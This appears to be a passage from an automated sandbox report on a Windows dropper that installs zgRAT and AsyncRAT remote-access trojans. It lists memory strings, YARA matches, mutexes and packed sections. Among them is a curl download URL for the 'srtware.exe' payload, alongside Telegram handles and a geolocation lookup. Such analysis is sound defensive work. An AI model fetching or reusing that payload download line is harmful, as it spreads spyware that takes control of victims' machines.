Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001F.00000002.1931775752.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.1931775752.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.1931775752.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fff.scr, 00000017.00000002.1627355609.00000000051DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://get.geoj8
Source: fff.scr, 00000017.00000002.1627355609.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://get.geojs.io
Source: fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: powershell.exe, 0000001F.00000002.1882121555.00000000050A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.1961955418.00000000077E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.micr
Source: powershell.exe, 00000008.00000002.1331519717.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1721126389.0000000005FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1776932795.0000000005817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1931775752.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: curl.exe, 00000015.00000002.1543978663.0000000002B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe
Source: curl.exe, 00000015.00000002.1543877418.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe-oC:
Source: curl.exe, 00000015.00000003.1543419156.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exeYv
Source: curl.exe, 00000015.00000003.1543397786.0000000002B15000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000002.1543978663.0000000002B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exej
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: fff.scr, 00000017.00000002.1627355609.0000000005273000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005129000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.000000000528D000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.000000000534E000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.00000000050D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/TheDyer
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/freakcodingspot
Source: fff.scr, 00000017.00000002.1627355609.0000000005273000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005129000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.000000000528D000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.000000000534E000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.0000000005071000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1627355609.00000000050D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/webster480
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: fff.scr, 00000017.00000002.1630207447.000000000618A000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006170000.00000004.00000800.00020000.00000000.sdmp, fff.scr, 00000017.00000002.1630207447.0000000006156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.7:49756 version: TLS 1.2

System Summary

barindex
Source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: qqq.scr PID: 3452, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: winnotify.scr PID: 5920, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: winnotify.scr PID: 7980, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: ZOL2mIYAUH.exe Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: fff.scr.14.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: qqq.scr.16.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: winnotify.scr.24.dr Static PE information: section name:
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Process Stats: CPU usage > 49%
Source: C:\Users\gbcd\qqq.scr Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F8321 0_2_001F8321
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_00201456 0_2_00201456
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_001F0738 0_2_001F0738
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_0035596C 0_2_0035596C
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E2220 0_2_045E2220
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045EB392 0_2_045EB392
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E2978 0_2_045E2978
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045EB9B8 0_2_045EB9B8
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045EAA90 0_2_045EAA90
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E6408 0_2_045E6408
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E5499 0_2_045E5499
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E54A8 0_2_045E54A8
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045EB5B5 0_2_045EB5B5
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E215E 0_2_045E215E
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E63C8 0_2_045E63C8
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E7E70 0_2_045E7E70
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E7E61 0_2_045E7E61
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E6990 0_2_045E6990
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045E6982 0_2_045E6982
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_045EAA2A 0_2_045EAA2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04C4B490 8_2_04C4B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_088E3E98 8_2_088E3E98
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F3ADB0 23_2_04F3ADB0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F31E00 23_2_04F31E00
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F3992E 23_2_04F3992E
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F324F0 23_2_04F324F0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F324E0 23_2_04F324E0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F34739 23_2_04F34739
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F31DD7 23_2_04F31DD7
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32E62 23_2_04F32E62
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F349ED 23_2_04F349ED
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F3498C 23_2_04F3498C
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32ADF 23_2_04F32ADF
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32AC5 23_2_04F32AC5
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32A99 23_2_04F32A99
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32A84 23_2_04F32A84
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F3EA08 23_2_04F3EA08
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32B5C 23_2_04F32B5C
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32B43 23_2_04F32B43
Source: C:\Users\gbcd\fff.scr Code function: 23_2_04F32B1C 23_2_04F32B1C
Source: C:\Users\gbcd\fff.scr Code function: 23_2_072504DE 23_2_072504DE
Source: C:\Users\gbcd\fff.scr Code function: 23_2_072510D8 23_2_072510D8
Source: C:\Users\gbcd\fff.scr Code function: 23_2_072505A8 23_2_072505A8
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075BA640 23_2_075BA640
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B4388 23_2_075B4388
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B72F0 23_2_075B72F0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075BAB21 23_2_075BAB21
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B3AB8 23_2_075B3AB8
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B98E0 23_2_075B98E0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B3770 23_2_075B3770
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B72E0 23_2_075B72E0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075BACB5 23_2_075BACB5
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075B98D0 23_2_075B98D0
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075BD8B8 23_2_075BD8B8
Source: C:\Users\gbcd\fff.scr Code function: 23_2_075BD8A7 23_2_075BD8A7
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B1B60 23_2_078B1B60
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B8742 23_2_078B8742
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B9188 23_2_078B9188
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B0006 23_2_078B0006
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B0040 23_2_078B0040
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B5F5D 23_2_078B5F5D
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078BDC58 23_2_078BDC58
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B8B19 23_2_078B8B19
Source: C:\Users\gbcd\fff.scr Code function: 23_2_078B8940 23_2_078B8940
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00603030 24_2_00603030
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005AE9EC 24_2_005AE9EC
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0060BA70 24_2_0060BA70
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005F926C 24_2_005F926C
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00605AB4 24_2_00605AB4
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00605BA0 24_2_00605BA0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005F7C84 24_2_005F7C84
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005AECB8 24_2_005AECB8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005ECCB8 24_2_005ECCB8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005F75C8 24_2_005F75C8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005AEE48 24_2_005AEE48
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00605E54 24_2_00605E54
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_006036FC 24_2_006036FC
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00609E80 24_2_00609E80
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00601E94 24_2_00601E94
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005FFF74 24_2_005FFF74
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00601E94 24_2_00601E94
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_00602FEC 24_2_00602FEC
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_005EC790 24_2_005EC790
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9B570 24_2_04F9B570
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F97D60 24_2_04F97D60
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F92638 24_2_04F92638
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9AE28 24_2_04F9AE28
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9D600 24_2_04F9D600
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9E738 24_2_04F9E738
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9B8B8 24_2_04F9B8B8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F97980 24_2_04F97980
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9E268 24_2_04F9E268
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F96CB0 24_2_04F96CB0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91CB7 24_2_04F91CB7
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F96CA0 24_2_04F96CA0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F93480 24_2_04F93480
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9247C 24_2_04F9247C
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F93471 24_2_04F93471
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91C48 24_2_04F91C48
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91C1E 24_2_04F91C1E
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9240F 24_2_04F9240F
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F97D88 24_2_04F97D88
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9B584 24_2_04F9B584
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91D75 24_2_04F91D75
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F96EF8 24_2_04F96EF8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91EFD 24_2_04F91EFD
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F96EE8 24_2_04F96EE8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91EC3 24_2_04F91EC3
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91E99 24_2_04F91E99
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9AE1A 24_2_04F9AE1A
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91FE7 24_2_04F91FE7
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91F98 24_2_04F91F98
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F920C7 24_2_04F920C7
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9B8A8 24_2_04F9B8A8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F95098 24_2_04F95098
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F92023 24_2_04F92023
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F921F5 24_2_04F921F5
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F97971 24_2_04F97971
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F92150 24_2_04F92150
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91AFC 24_2_04F91AFC
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F922F3 24_2_04F922F3
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F922C1 24_2_04F922C1
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91AC2 24_2_04F91AC2
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91A8C 24_2_04F91A8C
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F95A68 24_2_04F95A68
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91A58 24_2_04F91A58
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F95A58 24_2_04F95A58
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9221F 24_2_04F9221F
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F97208 24_2_04F97208
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91BF4 24_2_04F91BF4
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F9239F 24_2_04F9239F
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_04F91B48 24_2_04F91B48
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF2AD0 24_2_07CF2AD0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF3F59 24_2_07CF3F59
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF3E96 24_2_07CF3E96
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF5662 24_2_07CF5662
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF3CD7 24_2_07CF3CD7
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF3CA6 24_2_07CF3CA6
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF409F 24_2_07CF409F
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF30A6 24_2_07CF30A6
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_07CF406A 24_2_07CF406A
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A8B50 24_2_0A7A8B50
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A33D4 24_2_0A7A33D4
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A9028 24_2_0A7A9028
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AB8F0 24_2_0A7AB8F0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A30AF 24_2_0A7A30AF
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AE678 24_2_0A7AE678
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A8650 24_2_0A7A8650
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AC6C1 24_2_0A7AC6C1
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A94C8 24_2_0A7A94C8
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A3CB0 24_2_0A7A3CB0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A15B0 24_2_0A7A15B0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A7D80 24_2_0A7A7D80
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A325A 24_2_0A7A325A
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A7A38 24_2_0A7A7A38
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A3AC0 24_2_0A7A3AC0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A8B42 24_2_0A7A8B42
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A3313 24_2_0A7A3313
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A9022 24_2_0A7A9022
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AB8E0 24_2_0A7AB8E0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AB8F0 24_2_0A7AB8F0
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AB935 24_2_0A7AB935
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A31A1 24_2_0A7A31A1
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7ABC41 24_2_0A7ABC41
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7ABC38 24_2_0A7ABC38
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A94BA 24_2_0A7A94BA
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A3579 24_2_0A7A3579
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A8D76 24_2_0A7A8D76
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7ABD48 24_2_0A7ABD48
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7AADDA 24_2_0A7AADDA
Source: C:\Users\gbcd\qqq.scr Code function: 24_2_0A7A8D80 24_2_0A7A8D80
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: String function: 001EC264 appears 59 times
Source: C:\Users\gbcd\fff.scr Code function: String function: 00AAC264 appears 52 times
Source: ZOL2mIYAUH.exe Binary or memory string: OriginalFilename vs ZOL2mIYAUH.exe
Source: ZOL2mIYAUH.exe, 00000000.00000002.3688530749.00000000001C2000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesrtware.exe< vs ZOL2mIYAUH.exe
Source: ZOL2mIYAUH.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 23.2.fff.scr.a50000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.ZOL2mIYAUH.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 37.2.winnotify.scr.450000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000018.00000002.3715480219.0000000005101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: qqq.scr PID: 3452, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: winnotify.scr PID: 5920, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: winnotify.scr PID: 7980, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: ZOL2mIYAUH.exe Static PE information: Section: ZLIB complexity 0.9971657659774437
Source: ZOL2mIYAUH.exe Static PE information: Section: .d5scxa2 ZLIB complexity 0.9965811927590155
Source: fff.scr.14.dr Static PE information: Section: ZLIB complexity 0.998485779494382
Source: fff.scr.14.dr Static PE information: Section: .d5dcvew ZLIB complexity 0.9970135226624858
Source: qqq.scr.16.dr Static PE information: Section: ZLIB complexity 1.000197893722467
Source: qqq.scr.16.dr Static PE information: Section: .stovfcw ZLIB complexity 0.9967510944618451
Source: winnotify.scr.24.dr Static PE information: Section: ZLIB complexity 1.000197893722467
Source: winnotify.scr.24.dr Static PE information: Section: .stovfcw ZLIB complexity 0.9967510944618451
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@41/30@2/4
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_0035596C GetDiskFreeSpaceExA, 0_2_0035596C
Source: C:\Users\user\Desktop\ZOL2mIYAUH.exe Code function: 0_2_0046E048 CreateToolhelp32Snapshot, 0_2_0046E048
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\gbcd Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Users\Public\winnotify.scr Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Users\gbcd\fff.scr Mutant created: \Sessions\1\BaseNamedObjects\Ijicybumyrotapoverolelisajesobu
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Users\gbcd\qqq.scr Mutant created: \Sessions\1\BaseNamedObjects\fCdCfA9ZYKACsoTU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2092:120:WilError_03
